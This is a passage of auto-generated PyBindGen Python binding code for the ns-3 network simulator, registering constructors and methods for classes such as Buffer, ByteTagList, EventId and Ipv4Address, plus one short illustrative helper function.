## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList(ns3::AttributeConstructionList const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): void ns3::AttributeConstructionList::Add(std::string name, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::Ptr<ns3::AttributeValue> value) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'name'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::Ptr< ns3::AttributeValue >', 'value')])
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::Begin() const [member function]
cls.add_method('Begin',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::End() const [member function]
cls.add_method('End',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeConstructionList::Find(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('Find',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True)
return
def register_Ns3AttributeConstructionListItem_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item(ns3::AttributeConstructionList::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList::Item const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::value [variable]
cls.add_instance_attribute('value', 'ns3::Ptr< ns3::AttributeValue >', is_const=False)
return
def register_Ns3Buffer_methods(root_module, cls):
## buffer.h (module 'network'): ns3::Buffer::Buffer() [constructor]
cls.add_constructor([])
## buffer.h (module 'network'): ns3::Buffer::Buffer(uint32_t dataSize) [constructor]
cls.add_constructor([param('uint32_t', 'dataSize')])
## buffer.h (module 'network'): ns3::Buffer::Buffer(uint32_t dataSize, bool initialize) [constructor]
cls.add_constructor([param('uint32_t', 'dataSize'), param('bool', 'initialize')])
## buffer.h (module 'network'): ns3::Buffer::Buffer(ns3::Buffer const & o) [copy constructor]
cls.add_constructor([param('ns3::Buffer const &', 'o')])
## buffer.h (module 'network'): bool ns3::Buffer::AddAtEnd(uint32_t end) [member function]
cls.add_method('AddAtEnd',
'bool',
[param('uint32_t', 'end')])
## buffer.h (module 'network'): void ns3::Buffer::AddAtEnd(ns3::Buffer const & o) [member function]
cls.add_method('AddAtEnd',
'void',
[param('ns3::Buffer const &', 'o')])
## buffer.h (module 'network'): bool ns3::Buffer::AddAtStart(uint32_t start) [member function]
cls.add_method('AddAtStart',
'bool',
[param('uint32_t', 'start')])
## buffer.h (module 'network'): ns3::Buffer::Iterator ns3::Buffer::Begin() const [member function]
cls.add_method('Begin',
'ns3::Buffer::Iterator',
[],
is_const=True)
## buffer.h (module 'network'): void ns3::Buffer::CopyData(std::ostream * os, uint32_t size) const [member function]
cls.add_method('CopyData',
'void',
[param('std::ostream *', 'os'), param('uint32_t', 'size')],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::CopyData(uint8_t * buffer, uint32_t size) const [member function]
cls.add_method('CopyData',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')],
is_const=True)
## buffer.h (module 'network'): ns3::Buffer ns3::Buffer::CreateFragment(uint32_t start, uint32_t length) const [member function]
cls.add_method('CreateFragment',
'ns3::Buffer',
[param('uint32_t', 'start'), param('uint32_t', 'length')],
is_const=True)
## buffer.h (module 'network'): ns3::Buffer ns3::Buffer::CreateFullCopy() const [member function]
cls.add_method('CreateFullCopy',
'ns3::Buffer',
[],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::Deserialize(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## buffer.h (module 'network'): ns3::Buffer::Iterator ns3::Buffer::End() const [member function]
cls.add_method('End',
'ns3::Buffer::Iterator',
[],
is_const=True)
## buffer.h (module 'network'): int32_t ns3::Buffer::GetCurrentEndOffset() const [member function]
cls.add_method('GetCurrentEndOffset',
'int32_t',
[],
is_const=True)
## buffer.h (module 'network'): int32_t ns3::Buffer::GetCurrentStartOffset() const [member function]
cls.add_method('GetCurrentStartOffset',
'int32_t',
[],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## buffer.h (module 'network'): uint8_t const * ns3::Buffer::PeekData() const [member function]
cls.add_method('PeekData',
'uint8_t const *',
[],
is_const=True)
## buffer.h (module 'network'): void ns3::Buffer::RemoveAtEnd(uint32_t end) [member function]
cls.add_method('RemoveAtEnd',
'void',
[param('uint32_t', 'end')])
## buffer.h (module 'network'): void ns3::Buffer::RemoveAtStart(uint32_t start) [member function]
cls.add_method('RemoveAtStart',
'void',
[param('uint32_t', 'start')])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
return
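# --- Illustrative sketch (not part of the generated ns-3 bindings) ---------
# Every register_*_methods helper in this file follows the same PyBindGen
# pattern shown above: it receives the root module and a CppClass wrapper and
# declares constructors and methods with add_constructor()/add_method(),
# using param() for arguments and plain strings for return types.  The helper
# below is a hypothetical, self-contained example of that pattern; the class
# name 'Demo' and header 'demo.h' are assumptions for illustration only, and
# this function is never called by the generated code.
def _example_register_demo_methods(root_module, cls):
    ## demo.h (hypothetical): Demo::Demo() [constructor]
    cls.add_constructor([])
    ## demo.h (hypothetical): uint32_t Demo::GetSize() const [member function]
    cls.add_method('GetSize',
                   'uint32_t',
                   [],
                   is_const=True)
    return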
def register_Ns3BufferIterator_methods(root_module, cls):
## buffer.h (module 'network'): ns3::Buffer::Iterator::Iterator(ns3::Buffer::Iterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Buffer::Iterator const &', 'arg0')])
## buffer.h (module 'network'): ns3::Buffer::Iterator::Iterator() [constructor]
cls.add_constructor([])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::CalculateIpChecksum(uint16_t size) [member function]
cls.add_method('CalculateIpChecksum',
'uint16_t',
[param('uint16_t', 'size')])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::CalculateIpChecksum(uint16_t size, uint32_t initialChecksum) [member function]
cls.add_method('CalculateIpChecksum',
'uint16_t',
[param('uint16_t', 'size'), param('uint32_t', 'initialChecksum')])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetDistanceFrom(ns3::Buffer::Iterator const & o) const [member function]
cls.add_method('GetDistanceFrom',
'uint32_t',
[param('ns3::Buffer::Iterator const &', 'o')],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## buffer.h (module 'network'): bool ns3::Buffer::Iterator::IsEnd() const [member function]
cls.add_method('IsEnd',
'bool',
[],
is_const=True)
## buffer.h (module 'network'): bool ns3::Buffer::Iterator::IsStart() const [member function]
cls.add_method('IsStart',
'bool',
[],
is_const=True)
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Next() [member function]
cls.add_method('Next',
'void',
[])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Next(uint32_t delta) [member function]
cls.add_method('Next',
'void',
[param('uint32_t', 'delta')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Prev() [member function]
cls.add_method('Prev',
'void',
[])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Prev(uint32_t delta) [member function]
cls.add_method('Prev',
'void',
[param('uint32_t', 'delta')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Read(uint8_t * buffer, uint32_t size) [member function]
cls.add_method('Read',
'void',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadLsbtohU16() [member function]
cls.add_method('ReadLsbtohU16',
'uint16_t',
[])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadLsbtohU32() [member function]
cls.add_method('ReadLsbtohU32',
'uint32_t',
[])
## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadLsbtohU64() [member function]
cls.add_method('ReadLsbtohU64',
'uint64_t',
[])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadNtohU16() [member function]
cls.add_method('ReadNtohU16',
'uint16_t',
[])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadNtohU32() [member function]
cls.add_method('ReadNtohU32',
'uint32_t',
[])
## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadNtohU64() [member function]
cls.add_method('ReadNtohU64',
'uint64_t',
[])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadU16() [member function]
cls.add_method('ReadU16',
'uint16_t',
[])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadU32() [member function]
cls.add_method('ReadU32',
'uint32_t',
[])
## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadU64() [member function]
cls.add_method('ReadU64',
'uint64_t',
[])
## buffer.h (module 'network'): uint8_t ns3::Buffer::Iterator::ReadU8() [member function]
cls.add_method('ReadU8',
'uint8_t',
[])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Write(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Write',
'void',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Write(ns3::Buffer::Iterator start, ns3::Buffer::Iterator end) [member function]
cls.add_method('Write',
'void',
[param('ns3::Buffer::Iterator', 'start'), param('ns3::Buffer::Iterator', 'end')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU16(uint16_t data) [member function]
cls.add_method('WriteHtolsbU16',
'void',
[param('uint16_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU32(uint32_t data) [member function]
cls.add_method('WriteHtolsbU32',
'void',
[param('uint32_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU64(uint64_t data) [member function]
cls.add_method('WriteHtolsbU64',
'void',
[param('uint64_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU16(uint16_t data) [member function]
cls.add_method('WriteHtonU16',
'void',
[param('uint16_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU32(uint32_t data) [member function]
cls.add_method('WriteHtonU32',
'void',
[param('uint32_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU64(uint64_t data) [member function]
cls.add_method('WriteHtonU64',
'void',
[param('uint64_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU16(uint16_t data) [member function]
cls.add_method('WriteU16',
'void',
[param('uint16_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU32(uint32_t data) [member function]
cls.add_method('WriteU32',
'void',
[param('uint32_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU64(uint64_t data) [member function]
cls.add_method('WriteU64',
'void',
[param('uint64_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU8(uint8_t data) [member function]
cls.add_method('WriteU8',
'void',
[param('uint8_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU8(uint8_t data, uint32_t len) [member function]
cls.add_method('WriteU8',
'void',
[param('uint8_t', 'data'), param('uint32_t', 'len')])
return
def register_Ns3ByteTagIterator_methods(root_module, cls):
## packet.h (module 'network'): ns3::ByteTagIterator::ByteTagIterator(ns3::ByteTagIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagIterator const &', 'arg0')])
## packet.h (module 'network'): bool ns3::ByteTagIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## packet.h (module 'network'): ns3::ByteTagIterator::Item ns3::ByteTagIterator::Next() [member function]
cls.add_method('Next',
'ns3::ByteTagIterator::Item',
[])
return
def register_Ns3ByteTagIteratorItem_methods(root_module, cls):
## packet.h (module 'network'): ns3::ByteTagIterator::Item::Item(ns3::ByteTagIterator::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagIterator::Item const &', 'arg0')])
## packet.h (module 'network'): uint32_t ns3::ByteTagIterator::Item::GetEnd() const [member function]
cls.add_method('GetEnd',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::ByteTagIterator::Item::GetStart() const [member function]
cls.add_method('GetStart',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): void ns3::ByteTagIterator::Item::GetTag(ns3::Tag & tag) const [member function]
cls.add_method('GetTag',
'void',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): ns3::TypeId ns3::ByteTagIterator::Item::GetTypeId() const [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_const=True)
return
def register_Ns3ByteTagList_methods(root_module, cls):
## byte-tag-list.h (module 'network'): ns3::ByteTagList::ByteTagList() [constructor]
cls.add_constructor([])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::ByteTagList(ns3::ByteTagList const & o) [copy constructor]
cls.add_constructor([param('ns3::ByteTagList const &', 'o')])
## byte-tag-list.h (module 'network'): ns3::TagBuffer ns3::ByteTagList::Add(ns3::TypeId tid, uint32_t bufferSize, int32_t start, int32_t end) [member function]
cls.add_method('Add',
'ns3::TagBuffer',
[param('ns3::TypeId', 'tid'), param('uint32_t', 'bufferSize'), param('int32_t', 'start'), param('int32_t', 'end')])
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::Add(ns3::ByteTagList const & o) [member function]
cls.add_method('Add',
'void',
[param('ns3::ByteTagList const &', 'o')])
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::AddAtEnd(int32_t adjustment, int32_t appendOffset) [member function]
cls.add_method('AddAtEnd',
'void',
[param('int32_t', 'adjustment'), param('int32_t', 'appendOffset')])
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::AddAtStart(int32_t adjustment, int32_t prependOffset) [member function]
cls.add_method('AddAtStart',
'void',
[param('int32_t', 'adjustment'), param('int32_t', 'prependOffset')])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator ns3::ByteTagList::Begin(int32_t offsetStart, int32_t offsetEnd) const [member function]
cls.add_method('Begin',
'ns3::ByteTagList::Iterator',
[param('int32_t', 'offsetStart'), param('int32_t', 'offsetEnd')],
is_const=True)
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::RemoveAll() [member function]
cls.add_method('RemoveAll',
'void',
[])
return
def register_Ns3ByteTagListIterator_methods(root_module, cls):
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Iterator(ns3::ByteTagList::Iterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagList::Iterator const &', 'arg0')])
## byte-tag-list.h (module 'network'): uint32_t ns3::ByteTagList::Iterator::GetOffsetStart() const [member function]
cls.add_method('GetOffsetStart',
'uint32_t',
[],
is_const=True)
## byte-tag-list.h (module 'network'): bool ns3::ByteTagList::Iterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item ns3::ByteTagList::Iterator::Next() [member function]
cls.add_method('Next',
'ns3::ByteTagList::Iterator::Item',
[])
return
def register_Ns3ByteTagListIteratorItem_methods(root_module, cls):
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::Item(ns3::ByteTagList::Iterator::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagList::Iterator::Item const &', 'arg0')])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::Item(ns3::TagBuffer buf) [constructor]
cls.add_constructor([param('ns3::TagBuffer', 'buf')])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::buf [variable]
cls.add_instance_attribute('buf', 'ns3::TagBuffer', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::end [variable]
cls.add_instance_attribute('end', 'int32_t', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::size [variable]
cls.add_instance_attribute('size', 'uint32_t', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::start [variable]
cls.add_instance_attribute('start', 'int32_t', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::tid [variable]
cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
return
def register_Ns3CallbackBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function]
cls.add_method('GetImpl',
'ns3::Ptr< ns3::CallbackImplBase >',
[],
is_const=True)
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')],
visibility='protected')
## callback.h (module 'core'): static std::string ns3::CallbackBase::Demangle(std::string const & mangled) [member function]
cls.add_method('Demangle',
'std::string',
[param('std::string const &', 'mangled')],
is_static=True, visibility='protected')
return
def register_Ns3DeviceEnergyModelContainer_methods(root_module, cls):
## device-energy-model-container.h (module 'energy'): ns3::DeviceEnergyModelContainer::DeviceEnergyModelContainer(ns3::DeviceEnergyModelContainer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DeviceEnergyModelContainer const &', 'arg0')])
## device-energy-model-container.h (module 'energy'): ns3::DeviceEnergyModelContainer::DeviceEnergyModelContainer() [constructor]
cls.add_constructor([])
## device-energy-model-container.h (module 'energy'): ns3::DeviceEnergyModelContainer::DeviceEnergyModelContainer(ns3::Ptr<ns3::DeviceEnergyModel> model) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::DeviceEnergyModel >', 'model')])
## device-energy-model-container.h (module 'energy'): ns3::DeviceEnergyModelContainer::DeviceEnergyModelContainer(std::string modelName) [constructor]
cls.add_constructor([param('std::string', 'modelName')])
## device-energy-model-container.h (module 'energy'): ns3::DeviceEnergyModelContainer::DeviceEnergyModelContainer(ns3::DeviceEnergyModelContainer const & a, ns3::DeviceEnergyModelContainer const & b) [constructor]
cls.add_constructor([param('ns3::DeviceEnergyModelContainer const &', 'a'), param('ns3::DeviceEnergyModelContainer const &', 'b')])
## device-energy-model-container.h (module 'energy'): void ns3::DeviceEnergyModelContainer::Add(ns3::DeviceEnergyModelContainer container) [member function]
cls.add_method('Add',
'void',
[param('ns3::DeviceEnergyModelContainer', 'container')])
## device-energy-model-container.h (module 'energy'): void ns3::DeviceEnergyModelContainer::Add(ns3::Ptr<ns3::DeviceEnergyModel> model) [member function]
cls.add_method('Add',
'void',
[param('ns3::Ptr< ns3::DeviceEnergyModel >', 'model')])
## device-energy-model-container.h (module 'energy'): void ns3::DeviceEnergyModelContainer::Add(std::string modelName) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'modelName')])
## device-energy-model-container.h (module 'energy'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::DeviceEnergyModel>*,std::vector<ns3::Ptr<ns3::DeviceEnergyModel>, std::allocator<ns3::Ptr<ns3::DeviceEnergyModel> > > > ns3::DeviceEnergyModelContainer::Begin() const [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::DeviceEnergyModel > const, std::vector< ns3::Ptr< ns3::DeviceEnergyModel > > >',
[],
is_const=True)
## device-energy-model-container.h (module 'energy'): void ns3::DeviceEnergyModelContainer::Clear() [member function]
cls.add_method('Clear',
'void',
[])
## device-energy-model-container.h (module 'energy'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::DeviceEnergyModel>*,std::vector<ns3::Ptr<ns3::DeviceEnergyModel>, std::allocator<ns3::Ptr<ns3::DeviceEnergyModel> > > > ns3::DeviceEnergyModelContainer::End() const [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::DeviceEnergyModel > const, std::vector< ns3::Ptr< ns3::DeviceEnergyModel > > >',
[],
is_const=True)
## device-energy-model-container.h (module 'energy'): ns3::Ptr<ns3::DeviceEnergyModel> ns3::DeviceEnergyModelContainer::Get(uint32_t i) const [member function]
cls.add_method('Get',
'ns3::Ptr< ns3::DeviceEnergyModel >',
[param('uint32_t', 'i')],
is_const=True)
## device-energy-model-container.h (module 'energy'): uint32_t ns3::DeviceEnergyModelContainer::GetN() const [member function]
cls.add_method('GetN',
'uint32_t',
[],
is_const=True)
return
def register_Ns3DeviceEnergyModelHelper_methods(root_module, cls):
## energy-model-helper.h (module 'energy'): ns3::DeviceEnergyModelHelper::DeviceEnergyModelHelper() [constructor]
cls.add_constructor([])
## energy-model-helper.h (module 'energy'): ns3::DeviceEnergyModelHelper::DeviceEnergyModelHelper(ns3::DeviceEnergyModelHelper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DeviceEnergyModelHelper const &', 'arg0')])
## energy-model-helper.h (module 'energy'): ns3::DeviceEnergyModelContainer ns3::DeviceEnergyModelHelper::Install(ns3::Ptr<ns3::NetDevice> device, ns3::Ptr<ns3::EnergySource> source) const [member function]
cls.add_method('Install',
'ns3::DeviceEnergyModelContainer',
[param('ns3::Ptr< ns3::NetDevice >', 'device'), param('ns3::Ptr< ns3::EnergySource >', 'source')],
is_const=True)
## energy-model-helper.h (module 'energy'): ns3::DeviceEnergyModelContainer ns3::DeviceEnergyModelHelper::Install(ns3::NetDeviceContainer deviceContainer, ns3::EnergySourceContainer sourceContainer) const [member function]
cls.add_method('Install',
'ns3::DeviceEnergyModelContainer',
[param('ns3::NetDeviceContainer', 'deviceContainer'), param('ns3::EnergySourceContainer', 'sourceContainer')],
is_const=True)
## energy-model-helper.h (module 'energy'): void ns3::DeviceEnergyModelHelper::Set(std::string name, ns3::AttributeValue const & v) [member function]
cls.add_method('Set',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'v')],
is_pure_virtual=True, is_virtual=True)
## energy-model-helper.h (module 'energy'): ns3::Ptr<ns3::DeviceEnergyModel> ns3::DeviceEnergyModelHelper::DoInstall(ns3::Ptr<ns3::NetDevice> device, ns3::Ptr<ns3::EnergySource> source) const [member function]
cls.add_method('DoInstall',
'ns3::Ptr< ns3::DeviceEnergyModel >',
[param('ns3::Ptr< ns3::NetDevice >', 'device'), param('ns3::Ptr< ns3::EnergySource >', 'source')],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3EnergySourceHelper_methods(root_module, cls):
## energy-model-helper.h (module 'energy'): ns3::EnergySourceHelper::EnergySourceHelper() [constructor]
cls.add_constructor([])
## energy-model-helper.h (module 'energy'): ns3::EnergySourceHelper::EnergySourceHelper(ns3::EnergySourceHelper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EnergySourceHelper const &', 'arg0')])
## energy-model-helper.h (module 'energy'): ns3::EnergySourceContainer ns3::EnergySourceHelper::Install(ns3::Ptr<ns3::Node> node) const [member function]
cls.add_method('Install',
'ns3::EnergySourceContainer',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_const=True)
## energy-model-helper.h (module 'energy'): ns3::EnergySourceContainer ns3::EnergySourceHelper::Install(ns3::NodeContainer c) const [member function]
cls.add_method('Install',
'ns3::EnergySourceContainer',
[param('ns3::NodeContainer', 'c')],
is_const=True)
## energy-model-helper.h (module 'energy'): ns3::EnergySourceContainer ns3::EnergySourceHelper::Install(std::string nodeName) const [member function]
cls.add_method('Install',
'ns3::EnergySourceContainer',
[param('std::string', 'nodeName')],
is_const=True)
## energy-model-helper.h (module 'energy'): ns3::EnergySourceContainer ns3::EnergySourceHelper::InstallAll() const [member function]
cls.add_method('InstallAll',
'ns3::EnergySourceContainer',
[],
is_const=True)
## energy-model-helper.h (module 'energy'): void ns3::EnergySourceHelper::Set(std::string name, ns3::AttributeValue const & v) [member function]
cls.add_method('Set',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'v')],
is_pure_virtual=True, is_virtual=True)
## energy-model-helper.h (module 'energy'): ns3::Ptr<ns3::EnergySource> ns3::EnergySourceHelper::DoInstall(ns3::Ptr<ns3::Node> node) const [member function]
cls.add_method('DoInstall',
'ns3::Ptr< ns3::EnergySource >',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3EventId_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_binary_comparison_operator('==')
## event-id.h (module 'core'): ns3::EventId::EventId(ns3::EventId const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EventId const &', 'arg0')])
## event-id.h (module 'core'): ns3::EventId::EventId() [constructor]
cls.add_constructor([])
## event-id.h (module 'core'): ns3::EventId::EventId(ns3::Ptr<ns3::EventImpl> const & impl, uint64_t ts, uint32_t context, uint32_t uid) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::EventImpl > const &', 'impl'), param('uint64_t', 'ts'), param('uint32_t', 'context'), param('uint32_t', 'uid')])
## event-id.h (module 'core'): void ns3::EventId::Cancel() [member function]
cls.add_method('Cancel',
'void',
[])
## event-id.h (module 'core'): uint32_t ns3::EventId::GetContext() const [member function]
cls.add_method('GetContext',
'uint32_t',
[],
is_const=True)
## event-id.h (module 'core'): uint64_t ns3::EventId::GetTs() const [member function]
cls.add_method('GetTs',
'uint64_t',
[],
is_const=True)
## event-id.h (module 'core'): uint32_t ns3::EventId::GetUid() const [member function]
cls.add_method('GetUid',
'uint32_t',
[],
is_const=True)
## event-id.h (module 'core'): bool ns3::EventId::IsExpired() const [member function]
cls.add_method('IsExpired',
'bool',
[],
is_const=True)
## event-id.h (module 'core'): bool ns3::EventId::IsRunning() const [member function]
cls.add_method('IsRunning',
'bool',
[],
is_const=True)
## event-id.h (module 'core'): ns3::EventImpl * ns3::EventId::PeekEventImpl() const [member function]
cls.add_method('PeekEventImpl',
'ns3::EventImpl *',
[],
is_const=True)
return
def register_Ns3Ipv4Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(ns3::Ipv4Address const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4Address const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(uint32_t address) [constructor]
cls.add_constructor([param('uint32_t', 'address')])
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(char const * address) [constructor]
cls.add_constructor([param('char const *', 'address')])
## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::CombineMask(ns3::Ipv4Mask const & mask) const [member function]
cls.add_method('CombineMask',
'ns3::Ipv4Address',
[param('ns3::Ipv4Mask const &', 'mask')],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::Ipv4Address',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::Deserialize(uint8_t const * buf) [member function]
cls.add_method('Deserialize',
'ns3::Ipv4Address',
[param('uint8_t const *', 'buf')],
is_static=True)
## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Address::Get() const [member function]
cls.add_method('Get',
'uint32_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetAny() [member function]
cls.add_method('GetAny',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetBroadcast() [member function]
cls.add_method('GetBroadcast',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv4Address',
[],
is_static=True)
